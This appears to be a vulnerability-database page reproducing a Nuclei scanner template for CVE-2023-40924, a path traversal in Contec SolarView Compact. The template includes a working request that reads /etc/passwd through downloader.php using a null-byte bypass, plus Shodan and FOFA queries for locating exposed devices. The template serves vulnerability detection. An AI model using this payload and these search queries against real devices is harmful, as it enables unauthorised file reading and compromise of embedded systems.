| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2023-40924 | 8 Sep 202313:15 | ā | attackerkb | |
| CVE-2023-40924 | 8 Sep 202316:19 | ā | circl | |
| Contec SolarView Compact Path Traversal Vulnerability | 8 Sep 202300:00 | ā | cnnvd | |
| CVE-2023-40924 | 8 Sep 202300:00 | ā | cve | |
| CVE-2023-40924 | 8 Sep 202300:00 | ā | cvelist | |
| EUVD-2023-45463 | 3 Oct 202520:07 | ā | euvd | |
| CVE-2023-40924 | 8 Sep 202313:15 | ā | nvd | |
| CVE-2023-40924 | 8 Sep 202313:15 | ā | osv | |
| Directory traversal | 8 Sep 202313:15 | ā | prion | |
| PT-2023-27704 | 8 Sep 202300:00 | ā | ptsecurity |
id: CVE-2023-40924
info:
name: SolarView Compact < 6.00 - Directory Traversal
author: DhiyaneshDk
severity: high
description: |
SolarView Compact before version 6.00 is vulnerable to directory traversal via the file parameter in downloader.php. An unauthenticated attacker can read arbitrary files from the system by using path traversal sequences with a null byte bypass to access sensitive files such as /etc/passwd.
impact: |
An attacker can read sensitive system files including /etc/passwd which may contain password hashes on embedded devices, potentially leading to full system compromise.
remediation: |
Upgrade SolarView Compact to version 6.00 or later.
reference:
- https://github.com/Yobing1/CVE-2023-40924/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-40924
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-40924
epss-score: 0.02885
epss-percentile: 0.85148
cwe-id: CWE-22
cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: contec
product: solarview_compact_firmware
shodan-query:
- http.html:"SolarView Compact"
- http.favicon.hash:"-244067125"
- http.html:"solarview compact"
fofa-query:
- body="solarview compact"
- icon_hash="-244067125"
tags: cve,cve2023,lfi,solarview,contec,traversal,vuln
http:
- method: GET
path:
- "{{BaseURL}}/downloader.php?file=../../../../../../../../../../etc/passwd%00.jpg"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100c66bba0036a4e1f0324895ed121247907f5e788e2f3db6d8408f47ca68f8444a022100e418cda3e8e6c23ba55d5b530f30589ae3c11d6632608f107f067b1bc58c4625:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation